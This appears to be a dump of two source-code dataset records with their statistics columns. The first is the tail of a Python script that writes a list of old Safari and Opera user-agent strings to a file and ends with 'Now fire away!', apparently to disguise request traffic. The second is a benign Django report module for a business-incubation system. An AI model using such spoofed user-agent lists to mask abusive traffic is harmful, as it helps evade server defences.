Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fi-fi) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.3 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/4.0.1 Safari/530.18
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.1 Safari/530.18
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528+ (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; es-es) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; fi-FI) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10
Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10
Opera/9.80 (X11; Linux x86_64; U; Ubuntu/10.10 (maverick); pl) Presto/2.7.62 Version/11.01
Opera/9.80 (X11; Linux i686; U; ja) Presto/2.7.62 Version/11.01
Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.7.62 Version/11.01
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01
Mozilla/5.0 (Windows NT 6.1; U; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01
Mozilla/5.0 (Windows NT 6.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00
Opera/9.80 (X11; Linux i686; U; it) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00
Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00
Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00
Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00
Mozilla/5.0 (Windows NT 6.0; U; ja; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00
Mozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00
Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70
Mozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70
Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70
Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63
Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63
Opera/9.80 (Windows NT 5.1; U; MRA 5.6 (build 03278); ru) Presto/2.6.30 Version/10.63
Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.6.30 Version/10.62
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; en) Opera 10.62
Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61
Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.6.30 Version/10.61
Opera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61
Opera/9.80 (Macintosh; Intel Mac OS X; U; nl) Presto/2.6.30 Version/10.61
Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60
Opera/9.80 (Windows NT 6.0; U; nl) Presto/2.6.30 Version/10.60
Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60
Opera/10.60 (Windows NT 5.1; U; en-US) Presto/2.6.30 Version/10.60
Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54
Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53
Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/5.0 (Windows NT 5.1; U; Firefox/4.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/5.0 (Windows NT 5.1; U; Firefox/3.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; ko) Opera 10.53
Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52
Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51
Opera/9.80 (Windows NT 6.0; U; cs) Presto/2.5.22 Version/10.51
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (Linux i686; U; en) Presto/2.5.22 Version/10.51
Mozilla/5.0 (Windows NT 6.1; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51
Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51
Mozilla/4.0 (compatible; MSIE 8.0; Linux i686; en) Opera 10.51
Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50
Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 5.1; U; sk) Presto/2.5.22 Version/10.50
Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.50
Opera/10.50 (Windows NT 6.1; U; en-GB) Presto/2.2.2
Opera/9.80 (S60; SymbOS; Opera Tablet/9174; U; en) Presto/2.7.81 Version/10.5
Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10
Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 6.0; U; Gecko/20100115; pl) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 5.1; U; de) Presto/2.2.15 Version/10.10
Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.10
Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10
Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; de) Opera 10.10
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; tr) Opera 10.10
Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01
Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; pl) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; nb) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00
Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00
Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00
""")
FILE.close()
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END) | 93.673832 | 227 | 0.693618 | 22,258 | 100,231 | 3.108231 | 0.03392 | 0.025555 | 0.10173 | 0.088114 | 0.925184 | 0.919156 | 0.90661 | 0.891997 | 0.876935 | 0.85667 | 0 | 0.232401 | 0.118736 | 100,231 | 1,070 | 228 | 93.673832 | 0.550832 | 0.009688 | 0 | 0.026846 | 0 | 0.861937 | 0.983603 | 0.016256 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.003835 | 0.010547 | null | null | 0.022052 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
96578e03be5f8334aeb67d720dac9a8185a9fd75 | 4,003 | py | Python | bis/apps/incubator/views/customReports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | 2 | 2021-03-03T16:16:42.000Z | 2021-03-08T22:43:10.000Z | bis/apps/incubator/views/customReports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | bis/apps/incubator/views/customReports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | """
Custom reports
"""
# Django
from django.db.models import Count
# Models
from ..models import *
# Helpers
from ..helpers import queryFilters, helperDictionaries
def entrepreneursIncubated(dateFrom=None, dateTo=None):
"""
Returns all entrepreneurs ages count between a set of ranges
"""
queryset = Stage.objects
output = {
'queryset': None,
'fields': [],
'values': [],
'fieldLabels': [],
}
queryset = queryset.filter(stage_type="IN") # check for duplicated
projects = Project.objects.filter(id__in=queryset.values('project_id'))
entrepreneurs = Entrepreneur.objects.filter(id__in=projects.values('entrepreneurs'))
output['queryset'] = entrepreneurs
fieldsDict = helperDictionaries.getModelReportFields('entrepreneurs')
output['fieldDict'] = fieldsDict
output['fields'] = [*fieldsDict.keys()]
output['fieldLabels'] = [*fieldsDict.values()]
return output
def entrepreneursSex(dateFrom=None, dateTo=None):
"""
Returns all entrepreneurs sex count between a set of sex
"""
queryset = Stage.objects
output = {
'queryset': None,
'fields': [],
'values': [],
'fieldLabels': [],
}
queryset = queryset.filter(stage_type="IN") # check for duplicated
projects = Project.objects.filter(id__in=queryset.values('project_id'))
entrepreneurs = Entrepreneur.objects.filter(id__in=projects.values('entrepreneurs'))
output['queryset'] = entrepreneurs
fieldsDict = helperDictionaries.getModelReportFields('entrepreneurs')
output['fieldDict'] = fieldsDict
output['fields'] = [*fieldsDict.keys()]
output['fieldLabels'] = [*fieldsDict.values()]
return output
def projectsIncubated(dateFrom=None, dateTo=None):
"""
Returns all projects incubated between a set of ranges (if given)
"""
queryset = Stage.objects
output = {
'queryset': None,
'fields': [],
'values': [],
'fieldLabels': [],
}
queryset = queryset.filter(stage_type="IN") # check for duplicated
projects = Project.objects.filter(id__in=queryset.values('project_id'))
output['queryset'] = projects
fieldsDict = helperDictionaries.getModelReportFields('projects')
output['fieldDict'] = fieldsDict
output['fields'] = [*fieldsDict.keys()]
output['fieldLabels'] = [*fieldsDict.values()]
return output
def projectsPreincubated(dateFrom=None, dateTo=None):
"""
Returns all projects incubated between a set of ranges (if given)
"""
queryset = Stage.objects
output = {
'queryset': None,
'fields': [],
'values': [],
'fieldLabels': [],
}
queryset = queryset.filter(stage_type="PI") # check for duplicated
projects = Project.objects.filter(id__in=queryset.values('project_id'))
output['queryset'] = projects
fieldsDict = helperDictionaries.getModelReportFields('projects')
output['fieldDict'] = fieldsDict
output['fields'] = [*fieldsDict.keys()]
output['fieldLabels'] = [*fieldsDict.values()]
return output
def projectsSecondSeed(dateFrom=None, dateTo=None):
"""
Returns all projects that have a second capital seed
"""
queryset = Financing.objects
output = {
'queryset': None,
'fields': [],
'values': [],
'fieldLabels': [],
}
queryset = queryset.filter(code_type="A2") # check for duplicated
projects = Project.objects.filter(id__in=queryset.values('project_id'))
output['queryset'] = projects
fieldsDict = helperDictionaries.getModelReportFields('projects')
output['fieldDict'] = fieldsDict
output['fields'] = [*fieldsDict.keys()]
output['fieldLabels'] = [*fieldsDict.values()]
return output
REPORTS_DICT = {
'entrepreneurs_incubated': entrepreneursIncubated,
'projects_incubated': projectsIncubated,
'projects_preincubated': projectsPreincubated,
'projects_second_seed': projectsSecondSeed,
} | 31.769841 | 88 | 0.662253 | 373 | 4,003 | 7.02681 | 0.176944 | 0.053415 | 0.040061 | 0.045403 | 0.82831 | 0.812285 | 0.812285 | 0.762686 | 0.762686 | 0.762686 | 0 | 0.000313 | 0.202348 | 4,003 | 126 | 89 | 31.769841 | 0.820545 | 0.112416 | 0 | 0.758242 | 0 | 0 | 0.1568 | 0.012706 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054945 | false | 0 | 0.032967 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.